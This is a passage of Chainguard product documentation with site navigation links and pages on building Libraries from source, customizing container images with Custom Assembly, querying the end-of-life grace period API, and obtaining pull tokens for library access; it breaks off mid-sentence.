[chainctl libraries](https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_libraries/) - [chainctl libraries entitlements](https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_libraries_entitlements/) - [chainctl libraries entitlements list](https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_libraries_entitlements_list/) - [chainctl packages](https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_packages/) - [chainctl packages versions](https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_packages_versions/) - [chainctl packages versions list](https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_packages_versions_list/) - [chainctl update](https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_update/) - [chainctl version](https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_version/) ### 2 - [How to Install Sigstore Policy Controller](https://edu.chainguard.dev/open-source/sigstore/policy-controller/how-to-install-policy-controller/) - [An Introduction to 
Rekor](https://edu.chainguard.dev/open-source/sigstore/rekor/an-introduction-to-rekor/) - [An Introduction to Cosign](https://edu.chainguard.dev/open-source/sigstore/cosign/an-introduction-to-cosign/) - [How to Install the Rekor CLI](https://edu.chainguard.dev/open-source/sigstore/rekor/how-to-install-rekor/) - [How to Install Cosign](https://edu.chainguard.dev/open-source/sigstore/cosign/how-to-install-cosign/) - [How to Query Rekor](https://edu.chainguard.dev/open-source/sigstore/rekor/how-to-query-rekor/) - [How to Sign a Container with Cosign](https://edu.chainguard.dev/open-source/sigstore/cosign/how-to-sign-a-container-with-cosign/) - [How to Sign and Upload Metadata to Rekor](https://edu.chainguard.dev/open-source/sigstore/rekor/how-to-sign-and-upload-metadata-to-rekor/) - [How to Sign Blobs and Standard Files with Cosign](https://edu.chainguard.dev/open-source/sigstore/cosign/how-to-sign-blobs-with-cosign/) - [How to Set Up An Instance of Rekor Instance Locally](https://edu.chainguard.dev/open-source/sigstore/rekor/install-a-rekor-instance/) - [What is an SBOM (software bill of materials)?](https://edu.chainguard.dev/open-source/sbom/what-is-an-sbom/) - [How to Sign an SBOM with Cosign](https://edu.chainguard.dev/open-source/sigstore/cosign/how-to-sign-an-sbom-with-cosign/) - [Enforce SBOM attestation with Policy Controller](https://edu.chainguard.dev/open-source/sigstore/policy-controller/policies/enforce-sbom-attestation-with-policy-controller/) - [Disallowing Non-Default Capabilities](https://edu.chainguard.dev/open-source/sigstore/policy-controller/policies/disallowing-non-default-capabilities-with-policy-controller/) - [Disallowing Privileged Pods](https://edu.chainguard.dev/open-source/sigstore/policy-controller/policies/disallowing-privileged-containers-with-policy-controller/) - [Disallowing Run as Root User](https://edu.chainguard.dev/open-source/sigstore/policy-controller/policies/disallowing-run-as-root-user-with-policy-controller/) - [Maximum Container Image Age](https://edu.chainguard.dev/open-source/sigstore/policy-controller/policies/maximum-image-age-policy-controller/) - [Disallowing Unsafe sysctls](https://edu.chainguard.dev/open-source/sigstore/policy-controller/policies/disallowing-unsafe-sysctls-with-policy-controller/) - [Verify Signed Chainguard Containers](https://edu.chainguard.dev/open-source/sigstore/policy-controller/policies/using-policy-controller-to-verify-signed-chainguard-images/) - [How to Verify File Signatures with Cosign](https://edu.chainguard.dev/open-source/sigstore/cosign/how-to-verify-file-signatures-with-cosign/) - [Cosign: The Manual Way](https://edu.chainguard.dev/open-source/sigstore/cosign/cosign-manual-way/) - [Limit High or Critical CVEs in your Images Workloads](https://edu.chainguard.dev/open-source/sigstore/policy-controller/policies/critical-cve-policy/) - [Rego Policies](https://edu.chainguard.dev/open-source/sigstore/policy-controller/policies/chainguard-enforce-rego-policies/) - [Getting Started with OpenVEX and vexctl](https://edu.chainguard.dev/open-source/sbom/getting-started-openvex-vexctl/) - [melange Overview](https://edu.chainguard.dev/open-source/build-tools/melange/overview/) - [apko Overview](https://edu.chainguard.dev/open-source/build-tools/apko/overview/) - [What Makes a Good SBOM?](https://edu.chainguard.dev/open-source/sbom/what-makes-a-good-sbom/) - [What is OpenVex?](https://edu.chainguard.dev/open-source/sbom/what-is-openvex/) - [The Differences between SBOMs and 
Attestations](https://edu.chainguard.dev/open-source/sbom/sboms-and-attestations/) - [What is SLSA?](https://edu.chainguard.dev/open-source/slsa/what-is-slsa/) - [apko FAQs](https://edu.chainguard.dev/open-source/build-tools/apko/faq/) - [Example Policies](https://edu.chainguard.dev/open-source/sigstore/policy-controller/policies/chainguard-enforce-policy-examples/) - [Wolfi Overview](https://edu.chainguard.dev/open-source/wolfi/overview/) - [Getting Started with melange](https://edu.chainguard.dev/open-source/build-tools/melange/getting-started-with-melange/) - [Getting Started with apko](https://edu.chainguard.dev/open-source/build-tools/apko/getting-started-with-apko/) - [Updating bash on macOS](https://edu.chainguard.dev/open-source/update-bash-macos/) - [What is the Open Container Initiative?](https://edu.chainguard.dev/open-source/oci/what-is-the-oci/) - [What are OCI Artifacts?](https://edu.chainguard.dev/open-source/oci/what-are-oci-artifacts/) - [Troubleshooting melange Builds](https://edu.chainguard.dev/open-source/build-tools/melange/troubleshooting/) - [An Introduction to Fulcio](https://edu.chainguard.dev/open-source/sigstore/fulcio/an-introduction-to-fulcio/) - [Building a Wolfi Package](https://edu.chainguard.dev/open-source/wolfi/building-a-wolfi-package/) - [Wolfi FAQs](https://edu.chainguard.dev/open-source/wolfi/faq/) - [Troubleshooting apko Builds](https://edu.chainguard.dev/open-source/build-tools/apko/troubleshooting/) - [Why apk](https://edu.chainguard.dev/open-source/wolfi/apk-package-manager/) - [Hello Wolfi Workshop](https://edu.chainguard.dev/open-source/wolfi/hello-wolfi/) - [Creating Wolfi Images with Dockerfiles](https://edu.chainguard.dev/open-source/wolfi/wolfi-with-dockerfiles/) - [How to Keyless Sign a Container Image with Sigstore](https://edu.chainguard.dev/open-source/sigstore/how-to-keyless-sign-a-container-with-sigstore/) - [How to Generate a Fulcio Certificate](https://edu.chainguard.dev/open-source/sigstore/fulcio/how-to-generate-a-fulcio-certificate/) - [How to Inspect and Verify Fulcio Certificates](https://edu.chainguard.dev/open-source/sigstore/fulcio/how-to-inspect-and-verify-fulcio-certificates/) - [Package Version Selection](https://edu.chainguard.dev/open-source/wolfi/apk-version-selection/) - [Bazel Rules for apko](https://edu.chainguard.dev/open-source/build-tools/apko/bazel-rules/) - [melange FAQs](https://edu.chainguard.dev/open-source/build-tools/melange/faq/) ### 3 - [Introduction to the PCI Data Security Standard (DSS) 4.0](https://edu.chainguard.dev/software-security/compliance/pci-dss-4/intro-pci-dss-4/) - [Introduction to the Cybersecurity Maturity Model Certification (CMMC) 2.0](https://edu.chainguard.dev/software-security/compliance/cmmc-2/intro-cmmc-2/) - [Sea-curing Software #1 - Fighting Vulnerabilities](https://edu.chainguard.dev/software-security/comics/fighting-vulnerabilities/) - [What Are Software Vulnerabilities and CVEs?](https://edu.chainguard.dev/software-security/cves/cve-intro/) - [CMMC 2.0 Maturity Levels](https://edu.chainguard.dev/software-security/compliance/cmmc-2/cmmc-2-levels/) - [Why Care About Software Vulnerabilities?](https://edu.chainguard.dev/software-security/cves/cve-why-care/) - [Overview of PCI DSS 4.0 Practices/Requirements](https://edu.chainguard.dev/software-security/compliance/pci-dss-4/pci-dss-practices/) - [Overview of CMMC 2.0 Practices/Control Groups](https://edu.chainguard.dev/software-security/compliance/cmmc-2/cmmc-practices/) - [Infamous Software 
Vulnerabilities](https://edu.chainguard.dev/software-security/cves/infamous-cves/) - [Software Vulnerability Remediation](https://edu.chainguard.dev/software-security/cves/cve-remediation/) - [Simplify Your Path to PCI DSS 4.0 Compliance with Chainguard](https://edu.chainguard.dev/software-security/compliance/pci-dss-4/pci-dss-chainguard/) - [Simplify Your Path to CMMC 2.0 Compliance with Chainguard](https://edu.chainguard.dev/software-security/compliance/cmmc-2/cmmc-chainguard/) - [What are Containers?](https://edu.chainguard.dev/software-security/what-are-containers/) - [CISA Secure Software Development Attestation Form (Draft)](https://edu.chainguard.dev/software-security/secure-software-development/ssd-attestation-form/) - [Selecting a Base Container Image](https://edu.chainguard.dev/software-security/selecting-a-base-image/) - [What is software supply chain security](https://edu.chainguard.dev/software-security/what-is-software-supply-chain-security/) - [Chainguard Glossary](https://edu.chainguard.dev/software-security/glossary/) - [WTF happened with the PyPI phishing attack?](https://edu.chainguard.dev/software-security/videos/pypi/) - [WTF is a distroless container?](https://edu.chainguard.dev/software-security/videos/distroless/) - [WTF is a Typo Squatting Attack?](https://edu.chainguard.dev/software-security/videos/github-typosquatting/) - [WTF is Sigstore?](https://edu.chainguard.dev/software-security/videos/sigstore/) - [Secure Software Development Framework (SSDF) Table, NIST SP 800-218](https://edu.chainguard.dev/software-security/secure-software-development/ssdf/) - [Minimum Attestation References](https://edu.chainguard.dev/software-security/secure-software-development/minimum-attestation-references/) - [Overview of CIS Benchmarks](https://edu.chainguard.dev/software-security/compliance/cis-benchmarks/) - [Chainguard Libraries for Python](https://edu.chainguard.dev/software-security/learning-labs/ll202506/) - [Chainguard Libraries for Java](https://edu.chainguard.dev/software-security/learning-labs/ll202505/) - [Chainguard Trademark Use Policy](https://edu.chainguard.dev/software-security/trademark/) --- ## Full Documentation ## Section: 0 ### Vulnerability Information URL: https://edu.chainguard.dev/vulnerabilities/ Last Modified: October 6, 2022 --- ## Section: 1 ### Chainguard Libraries Overview URL: https://edu.chainguard.dev/chainguard/libraries/overview/ Last Modified: April 1, 2025 Tags: Chainguard Libraries, Overview Background Most application development rests on the shoulders of libraries and applications from the open source community. Organizations and application developers consume those libraries as binaries from a collection of sources. Binary versions are produced by individual project maintainers or through continuous integration server setups, and are publicly distributed through various channels. Open source libraries use different distribution services for their binary artifacts. Common examples are the Maven Central Repository for the Java and JVM ecosystem, the npm registry for the JavaScript community, or Python Package Index (PyPI) for the Python community. All ecosystems also include numerous other repositories with lower usage rates, but also often reduced quality, oversight, or security. 
While convenient, these services remove the direct link from your application to the source code of a specific project, and create a potential risk for quality issues with the artifacts, man-in-the-middle attacks, removal or override of libraries with vulnerable or malicious versions, and other issues. The Supply-chain Levels for Software Artifacts (SLSA) specification describes these risks and how to protect your software against them.

In this common use of open source via binary artifacts, you put tremendous trust into the following aspects for the dozens or even hundreds of open source libraries you typically use for each application:

- Maintainers and specifically release managers of the projects
- Local workstation or CI setup used for the release build
- Release process mechanisms to create the binaries
- Transport of the binaries from the build system to the public repositories
- Management of access to the repositories
- Monitoring of repositories for attacks as well as harmful or malicious binaries
- Traffic to public repositories and attacks on the transport to your infrastructure

There are no real guarantees as to the actual provenance of the software code. Repositories also vary greatly in quality, and there is no guarantee that the upstream source of a project is available in a repository. In addition, these repositories also hold non-open source binaries of libraries. All these factors create uncertainty. Using these public repositories can feel as opaque as picking up a USB drive off the sidewalk and plugging its contents into your production environment.

#### Introduction

Chainguard Libraries builds all available libraries from source code in the Chainguard Factory and makes them available for you. The Chainguard Factory represents Chainguard’s internal tooling that enables a more secure, dedicated, private, and SLSA-certified build infrastructure for building software from source and publishing the binaries to customers. Chainguard Libraries and the use of the Chainguard Factory remove all software supply chain problems for libraries:

- Build stage protection - All binary libraries and library versions are built within the trusted Chainguard infrastructure directly from the source code of the official project.
- Distribution stage protection - Binaries are handled and managed only by Chainguard and made exclusively available for your consumption.

Any supply chain attacks at the build and distribution stages are eliminated, since all steps from the source to your use are handled by Chainguard. If there is no open source code available, no binaries are made available by Chainguard. This eliminates any license-related risks from commercial libraries. The policy and process to have no binaries without source also removes the danger from malicious artifacts, since these artifacts do not provide source code in public code repositories.

Chainguard Libraries is available for the following library ecosystems:

- Java and the larger Java Virtual Machine (JVM) ecosystem with Chainguard Libraries for Java

---

### Chainguard Custom Assembly

URL: https://edu.chainguard.dev/chainguard/chainguard-images/features/ca-docs/custom-assembly/
Last Modified: March 21, 2025
Tags: Chainguard Containers, Product

Chainguard has created Custom Assembly, a tool that allows users to create customized container images with extra packages added. This enables customers to reduce their risk exposure by creating container images that are tailored to their internal organization and application requirements while still having few-to-zero CVEs.
This guide outlines how to build customized Chainguard Containers using Custom Assembly in the Chainguard Console. It includes a brief overview of how Custom Assembly works, as well as its limitations.

NOTE: The Custom Assembly tool is currently in its beta phase and it is likely to go through changes before it becomes generally available.

#### About Custom Assembly

Custom Assembly is only available to customers that have access to Production Chainguard Containers. Additionally, your account team must enable Custom Assembly before you will be able to begin using it. Contact your account team directly to start the process.

When you enable the Custom Assembly tool for your organization, you must select at least one of Chainguard’s application images to serve as the source for your customized container image. For example, if you want to build a custom base for a Python application, you would likely elect to use the Python Chainguard Container as the source for your customized image.

After selecting the packages for your customized container image, Chainguard will kick off a build on Chainguard’s infrastructure. Once a customized image is built successfully, Chainguard will take care of its maintenance and rebuild it as necessary, such as when any of the packages in the image are updated.

#### Limitations

Custom Assembly only allows you to add packages into a given container image; you cannot remove the packages included in the source application image by default. For example, Chainguard’s Node.js container image comes with packages like nodejs-23, npm, and glibc by default. These packages can’t be removed from a Node.js image using the Custom Assembly tool but you can add other packages into it, and you can remove these added packages in later builds.

The packages you can add to a container image are those that your organization already has access to based on the Chainguard Containers you have already purchased. Additionally, you can only add supported versions of packages to a customized image.

The changes you make to your customized container image may affect its functional behavior when deployed. Chainguard doesn’t test your final customized image and therefore doesn’t guarantee its functional behavior. Please test your customized images extensively to ensure they meet your requirements.

Lastly, while Custom Assembly is in its beta phase it can only be configured from the Chainguard Console.

#### Accessing Customized Containers in the Console

To provision a customized container image, reach out to your account team who will configure one for you.

Note: This overview highlights using the Chainguard Console’s UI to interact with Custom Assembly resources. However, you can also interact with Custom Assembly using chainctl, Chainguard’s command-line interface tool, as well as the Chainguard API.

After logging in to the Chainguard Console, you will be greeted with your account overview page. If you belong to more than one organization, be sure to select the organization which has Custom Assembly enabled from the drop-down menu in the top-left corner. Click on Organization Containers and scroll or search for the customized container image that was set up by your account team. This will typically have a name that specifies the source container image while also highlighting that it is a customized image, such as python-custom or node-custom. Once you’ve found it, click on the container image.
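Although this walkthrough uses the Console, the note above points out that chainctl can manage Custom Assembly resources as well. If you prefer a terminal, one quick way to locate the customized repository is to list your organization’s repositories; the same command is used later in this document to look up repository IDs:

```sh
# List the container repositories your organization has access to. The
# customized repository typically has a name such as python-custom or node-custom.
chainctl images repos list --parent $ORGANIZATION
```

Replace $ORGANIZATION with your organization’s name, as elsewhere in this guide.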
#### Selecting Packages and Building a Customized Container

Clicking on the Custom Assembly container image will take you to its entry in the Console. In the upper right corner of this page, you’ll find a button that says Customize Containers:

Click on this button to open a window displaying a list of all of the packages available to be added or removed from your selected container image. This list of packages includes all the packages your organization is entitled to. If there’s a package you’d like to include in your image but it isn’t available in this list, reach out to your account team for access.

You can scroll through the list and select or deselect packages to tailor the image to your needs by checking their respective boxes. Alternatively, you can use the search box to filter for the packages you’re looking for. After selecting your chosen packages, click the Preview Changes button to view all the packages you’ve selected for the customized image:

If you’d like to make further changes, click the Back button to return to the package selection. If you’re satisfied with the selection of packages, click the Apply Changes button to build the new customized image. You will receive a confirmation message at the top of the Customize Container display letting you know that the image was successfully customized.

If a build fails, you’ll need to make the appropriate changes before attempting another build. You can check the build logs for information about what went wrong and what to fix.

#### Listing Builds and Viewing Logs

You can view a list of all the available builds of your customized container image by clicking the customized image’s Builds tab in the Console:

The table in the Builds tab has six columns:

- ID: A unique identifier representing a specific customized container image build.
- Version: The container image version the build represents.
- Status: The status of the given build. When a build is successful, this column will show a green check inside of a circle. When a build has failed, this column will display a red exclamation mark in a triangle.
- Digest: A unique, content-based hash representing the given container image build.
- Duration: The amount of time it took to build the container image.
- Created: How long it’s been since the build was created.

Note that if you only recently customized the container image it may take a few minutes for the latest builds to populate. Additionally, builds will only stay listed in the Console for 24 hours. This is because Chainguard Containers, including Custom Assembly container images, are rebuilt frequently and would quickly congest the user interface.

You can click on the row of any build listed in the Builds tab to access its logs. This will cause a window to appear from the right where you can get more details about the build, including build failures:

#### Using Customized Containers

You can use Docker to download the customized container image for testing or use, like this:

```
docker pull cgr.dev/$ORGANIZATION/$CUSTOMIZED-CONTAINER:latest
```

Be sure to change $ORGANIZATION to reflect the name used for your organization’s private repository within the Chainguard registry and replace $CUSTOMIZED-CONTAINER with the actual name of your container image. Additionally, replace latest with your chosen tag, if different. You can find a list of all the available tags for your customized container in its Versions tab in the Console.
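If you’d rather check the available tags from a terminal, a registry client such as crane (from the go-containerregistry project) can list them too. This is a hedged aside rather than part of the original walkthrough; it assumes you have already set up registry credentials for cgr.dev, for example with `chainctl auth configure-docker`:

```sh
# List the tags published for the customized repository
# (assumes prior authentication to cgr.dev).
crane ls cgr.dev/$ORGANIZATION/$CUSTOMIZED-CONTAINER
```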
Note that you can also download specific builds of a container image by referencing the build’s unique digest, as in this example:

```
docker pull cgr.dev/$ORGANIZATION/$CUSTOMIZED-CONTAINER@sha256:e24d3X4MPL338cb75b3X4MPL3674bd908681fca3X4MPL31e3d0321b892b9611d
```

Pulling container images by digest can improve reproducibility. If you run into any issues with your customized container images or with using the Custom Assembly tool, please reach out to your account team for assistance.

#### Installing packages from a Chainguard private APK repository

Chainguard offers Private APK Repositories which you can use to access the apk packages available to your organization. You can use your organization’s private APK repository to further customize your Custom Assembly containers.

As an example, run a container with a Custom Assembly container image that has a shell and package manager, such as a -dev variant of a customized container image:

```
docker run -it --entrypoint /bin/sh --user root \
  -e "HTTP_AUTH=basic:apk.cgr.dev:user:$(chainctl auth token --audience apk.cgr.dev)" \
  cgr.dev/$ORGANIZATION/$CUSTOMIZED-CONTAINER:latest-dev
```

Note that this command injects an HTTP_AUTH environment variable directly into the container by calling chainctl from the host machine to obtain an ephemeral token. This is necessary to authenticate to the private repository.

By default, your organization’s private APK repository will be listed in the container’s list of APK repositories:

```
cat /etc/apk/repositories
https://apk.cgr.dev/45a0c3X4MPL3977f03X4MPL3ac06a63X4MPL3595
```

The repository address in this file (which includes a long unpronounceable string) will differ from the one shown in the Console (which reflects the organization name). The string shown in the repositories file is the ID number of the organization. You can confirm this by running the `chainctl iam organizations ls -o table` command.

To search for and install packages from the private APK repository, first update the package index:

```
apk update
fetch https://apk.cgr.dev/45a0c3X4MPL3977f03X4MPL3ac06a63X4MPL3595/x86_64/APKINDEX.tar.gz
[https://apk.cgr.dev/45a0c3X4MPL3977f03X4MPL3ac06a63X4MPL3595]
OK: 1019 distinct packages available
```

Then you can search for packages available in your private repo. The following example searches for packages named “mongo”:

```
apk search mongo
mongo-5.0-5.0.31-r0
mongo-6.0-6.0.20-r0
mongo-7.0-7.0.16-r0
mongo-8.0-8.0.4-r1
mongod-5.0-5.0.31-r0
mongod-6.0-6.0.20-r0
mongod-7.0-7.0.16-r0
mongod-8.0-8.0.4-r1
```

Finally, you can install a package with apk:

```
apk add mongo
(1/1) Installing mongo-8.0 (8.0.4-r1)
Executing busybox-1.37.0-r0.trigger
OK: 719 MiB in 78 packages
```

To learn more, refer to our Private APK Repositories documentation.
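The same private repository can also be used non-interactively when you build your own image on top of a Custom Assembly image. The following Dockerfile is a minimal, hypothetical sketch rather than an official pattern from this guide: it assumes a -dev variant with apk available, BuildKit secret mounts, and a nonroot user in the image; the mongo package and the placeholder names mirror the examples above.

```Dockerfile
# Hypothetical sketch: extend a Custom Assembly -dev image and install an extra
# package from the organization's private APK repository at build time.
# ORGANIZATION and CUSTOMIZED-CONTAINER are placeholders, as elsewhere in this guide.
FROM cgr.dev/ORGANIZATION/CUSTOMIZED-CONTAINER:latest-dev
USER root

# Provide the ephemeral token as a BuildKit secret so it is never written to a layer:
#   chainctl auth token --audience apk.cgr.dev > /tmp/cgr-token
#   docker build --secret id=cgr-token,src=/tmp/cgr-token -t my-customized-app .
RUN --mount=type=secret,id=cgr-token \
    export HTTP_AUTH="basic:apk.cgr.dev:user:$(cat /run/secrets/cgr-token)" && \
    apk update && apk add mongo

# Return to an unprivileged user (assumed to exist in the image).
USER nonroot
```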
That means customers no longer have to stand up and maintain their own builds, saving costs in the form of infrastructure, engineering overhead, and complexity. This overview focused on managing Custom Assembly resources through the Chainguard Console. You can also interact with Custom Assembly using chainctl as well as the Chainguard API. We encourage you to check out our resources on our other Chainguard Containers features, including the following: Unique Tags CVE Visualizations Custom Certificates Additionally, for more information on working with Chainguard Containers, refer to our docs on How to Use Chainguard Containers. --- ### Chainguard End-of-Life Grace Period for Containers URL: https://edu.chainguard.dev/chainguard/chainguard-images/features/eol-gp-overview/ Last Modified: June 11, 2024 Tags: Chainguard Containers, Product Typically, specific versions of software receive updates on a schedule for a set amount of time. Eventually, though, every version of software will stop receiving support. When project maintainers stop providing updates, it’s known as the End-of-Life (EOL) stage. It’s recommended that when a software version reaches the EOL phase, users should migrate their projects to a later version, as EOL software is known to accumulate vulnerabilities. However, there are cases where an organization may want to continue using a container image after it has reached end-of-life. This could be because an image reaches EOL before the organization’s release schedule, or perhaps later image versions have one or more issues that prevent the organization from upgrading. To help in situations like this, Chainguard offers an end-of-life grace period for eligible Containers to all Chainguard Containers customers. This article provides an overview of Chainguard’s EOL grace period, and also includes a brief introduction to using Chainguard’s API to retrieve information about an image’s EOL grace period status. Understanding Chainguard’s EOL Grace Period Chainguard’s EOL grace period gives customers access to new builds of container images whose primary package has entered its end-of-life phase, for up to six months after the primary package reaches EOL. During this time, Chainguard will address vulnerabilities and update any non-EOL packages within the container image (other than the image’s primary package). Chainguard will continue to rebuild the image for a maximum of six months after the primary package enters its EOL phase or until the build fails. Note: Chainguard is not able to offer any exceptions to the 6 month limit for the EOL grace period. You will be able to find the end date of a given container image version’s grace period in the Chainguard Console. From the Organization Images tab, select an image. You’ll be taken to that container image’s Versions page, and the end date of each grace period will be listed under the respective version: As of this writing, a container image must meet four key requirements to be eligible for coverage under the EOL grace period: It is listed as part of the current available or EOL versions for a version stream package present in our catalog Has multiple release tracks Is within six months of its official EOL date (as declared by upstream project maintainers) Its release and EOL dates are available on the endoflife.date website Be aware that the following are not covered by Chainguard’s EOL grace period: Updating an image’s EOL primary package. Backporting or cherry-picking individual commits or patches to the EOL primary package.
Any package labeled end-of-life for more than 6 months by its open-source creators or maintainers. Additionally, if a container image fails to build because underlying dependencies conflict with the primary package, it will no longer be supported. A failed build signals the end of support for that image: the grace period ends immediately for that image version, and Chainguard will not attempt further updates or CVE remediations after the build failure. After a grace period ends, your organization will retain access to the last successful build of the image. Chainguard will stop providing updates and CVE remediations; although the image will remain usable, it won’t receive any ongoing security maintenance. Once an image’s grace period has ended, we strongly recommend upgrading to a supported version as soon as possible. Planning for and managing an EOL grace period lifecycle To maximize the value of a grace period, we recommend the following: Before the grace period starts: Identify all dependent applications and services using the container image Create an upgrade plan with realistic timelines Document any known issues or compatibility requirements Set up monitoring for the container images During the grace period: Test newer versions of the image in a development environment Track and resolve any compatibility issues Begin deploying updated versions to non-critical environments Monitor for any build failures or dependency conflicts Before expiration: Complete all necessary testing of the new version Schedule the production upgrade Document any configuration changes needed Prepare rollback procedures if needed Using the EOL Grace Period API Although the Chainguard Console is a useful interface, many customers would prefer to integrate EOL data with their preferred tools for faster, more convenient monitoring. For this reason, Chainguard has developed an API to serve customers with EOL data sufficient for monitoring the lifecycle of their images. The API endpoint you can reach for EOL data is Registry_ListEolTags. This section outlines how you can use curl to make a call to this API endpoint. To follow along, you’ll need to know the unique ID path (UIDP) of the container image repository you’d like to retrieve end-of-life data for. You can find this with the following chainctl command:
chainctl images repos list --parent $ORGANIZATION -o wide
Replace $ORGANIZATION with the name of your organization. This command will return a table showing the UIDPs of every Chainguard Container the specified organization has access to:
ID                               | REGISTRY            | REPO   | BUNDLES               | TIER
---------------------------------+---------------------+--------+-----------------------+--------------
ORGANIZATION_ID/165aEXAMPLE5b7ae | cgr.dev/example.com | nginx  | application, featured | APPLICATION
ORGANIZATION_ID/4408EXAMPLE4131a | cgr.dev/example.com | node   | base                  | UNKNOWN
ORGANIZATION_ID/37a2EXAMPLE0d419 | cgr.dev/example.com | python | base, featured        | UNKNOWN
With the image repository ID, you can make a request to the API endpoint with a command like the following.
Make sure to replace $ORGANIZATION_ID/4408EXAMPLE4131a with the container image repository UIDP you just found:
curl -H "Authorization: Bearer $(chainctl auth token)" "https://console-api.enforce.dev/registry/v1/eoltags?uidp.childrenOf=$ORGANIZATION_ID/4408EXAMPLE4131a" | jq .
Note that this example includes the -H argument to pass an authorization header to the API. This header is constructed with the chainctl auth token command, which prints the local Chainguard token, allowing you to authenticate to the API. It also pipes the curl command’s output into jq, a lightweight JSON processor, in order to make it easier to read. This command will return EOL data for each image within the repository, which will be delivered in the following format:
{
  "items": [
    . . .
    {
      "id": "ORGANIZATION_ID/4408EXAMPLE4131a/9ef6EXAMPLE6265c",
      "name": "18.20.8-slim",
      "mainPackageName": "nodejs",
      "tagStatus": "TAG_IN_GRACE",
      "mainPackageVersion": {
        "eolDate": "2025-04-30",
        "exists": true,
        "fips": false,
        "lts": "2022-10-25",
        "releaseDate": "2022-04-19",
        "version": "18",
        "eolBroken": false
      },
      "graceStatus": "GRACE_ACTIVE",
      "gracePeriodExpiryDate": "2025-10-30T00:00:00Z"
    },
    . . .
  ]
}
This example output is derived from an API call made on a node image repository, and the data returned presents a lot of useful information, some of which is highlighted here: id: the UID of the specific image this block of data represents name: the given container image’s tag tagStatus: whether the tag can support a grace period, with the following possible statuses: TAG_ACTIVE: the tag is continuing to be built, but is not in a grace period TAG_IN_GRACE: the tag is in a grace period TAG_INACTIVE: the tag is not in a grace period and is no longer being built mainPackageVersion: this section shows some information about the main package itself: eolDate: the date on which the image’s main package reached EOL lts: the date on which this version of the main package entered its long-term support period releaseDate: the date on which the main package’s version was released graceStatus: the status of whether or not the given container image is in an active grace period GRACE_ACTIVE, as shown in this example, indicates the image is in an active grace period any images that are not currently in a grace period but may be in the future will show GRACE_ELIGIBLE any container images that will never enter a grace period will show GRACE_NOT_ELIGIBLE gracePeriodExpiryDate: the date on which the image’s grace period will end Of course, you won’t use curl to interact with the Chainguard API in most scenarios. Instead, you’ll likely have some kind of application that can ingest and process this EOL data. For example, your organization could create a Slackbot that fetches data from the Chainguard EOL grace period API and posts messages about EOL tags approaching their grace period expiration to a specified Slack channel. Chainguard’s API documentation includes request samples for many languages and platforms, including Go, Python, and Java. Learn More Chainguard’s EOL grace period gives customers the opportunity to continue to receive best-effort CVE remediated updates on EOL images, while they work on transitioning to a newer upstream version. For more information on the EOL grace period, please contact us. Additionally, our doc outlining the Chainguard Containers Product Release Lifecycle can be helpful for understanding Chainguard’s approach to updates, releases, and versions within Chainguard Containers.
Finally, our conceptual article on How End-of-Life Software Accumulates Vulnerabilities is helpful for understanding the risk involved with using end-of-life software by outlining how EOL images accrue vulnerabilities and where they accumulate. --- ### Chainguard Libraries Access URL: https://edu.chainguard.dev/chainguard/libraries/access/ Last Modified: April 7, 2025 Tags: Chainguard Libraries, Overview Access to Chainguard Libraries is consistent across all permissions and accounts of the Chainguard platform. If you are not a Chainguard user yet, a new Chainguard account must be created and configured for access to Chainguard Libraries. If you are already a Chainguard user, the Chainguard account owner in your organization can grant access to Chainguard Libraries. In both cases, confirm the name of the organization so you can use it with the --parent parameter to specify the organization. Initial authentication Once your user account is created and access is confirmed, install the Chainguard Control chainctl command line tool and log in to your account:
chainctl auth login
After authentication in a browser window, a successful login displays a message and a token:
Successfully exchanged token.
Valid! Id: 8a4141a........7d9904d98c
Pull token for libraries Retrieve a new authentication token for the Chainguard Libraries for Java with the chainctl auth pull-token command:
chainctl auth pull-token --library-ecosystem=java --parent=example --ttl=8670h
--library-ecosystem=java: retrieve the token for use with Chainguard Libraries for Java. Use python for a token to use Chainguard Libraries for Python. --parent=example: specify the parent organization for your account as provided when requesting access to Chainguard Libraries and replace example. --ttl=8670h: set the duration for the validity of the token; defaults to 720h (equivalent to 30 days), maximum valid value is 8760h (equivalent to 365 days), valid unit strings range from nanoseconds to hours and are ns, us, ms, s, m, and h. When the parent parameter is omitted, a list of organizations may be displayed. Use the arrow keys to navigate the selection displayed after the question “With which location is the pull token associated?” and select the organization that has the entitlement to access Chainguard Libraries for Java. Press / to filter the list. chainctl returns a username and password suitable for basic authentication in the response:
Username: 45a.....424eb0
Password: eyJhbGciO..........WF0IjoxN
The returned username and password combination is a new credential set in the organization that is independent of the account used to create and retrieve the credential set. It is therefore suitable for use in any service application, such as a repository manager or a build tool that is not tied to a specific user. To use this pull token in another environment, supply the returned values as the username and password for basic authentication. Note that the actual returned values are much longer. Verification Use the credentials for manual testing in a browser or with a script and curl if you know the URL for a specific library artifact. Refer to the following sections for more details: Technical details and manual testing for Java libraries Technical details and manual testing for Python libraries Use environment variables .netrc for authentication Use environment variables Using environment variables for username and password is more secure than hardcoding the values in configuration files.
In addition, you can use the same configuration and files for all users to simplify setup and reduce errors. Use the env environment output option to create a snippet for a new token suitable for integration in a script. $ chainctl auth pull-token --output env --library-ecosystem=java --parent=example export CHAINGUARD_JAVA_IDENTITY_ID=45a.....424eb0 export CHAINGUARD_JAVA_TOKEN=eeyJhbGciO..........WF0IjoxN Combine the call with eval to populate the environment variables directly by calling chainctl: eval $(chainctl auth pull-token --output env --library-ecosystem=java --parent=example) Equivalent commands for Python are supported and result in values for the CHAINGUARD_PYTHON_IDENTITY_ID and CHAINGUARD_PYTHON_TOKEN variables. Running this command as part of a login script or some other automation allows your organization to replace actual username and password values in your build tool configuration with environment variable placeholders: Java build tool configuration Python build tool configuration .netrc for authentication curl and a number of other tools support configuration of username and password authentication details for a specific domain in the .netrc file, typically located in the user’s home directory. Use this approach for authentication to a repository manager in your organization or to Chainguard Libraries directly, for example with pip and others for Chainguard Libraries for Python, with bazel for Chainguard Libraries for Java or for manual testing with curl. The following example shows a suitable setup for a repo manager available at repo.example.com: machine repo.example.com login YOUR_USERNAME_FOR_REPOSITORY_MANAGER password YOUR_PASSWORD For a direct connection to Chainguard Libraries, for example for testing with curl, use the following example with the username 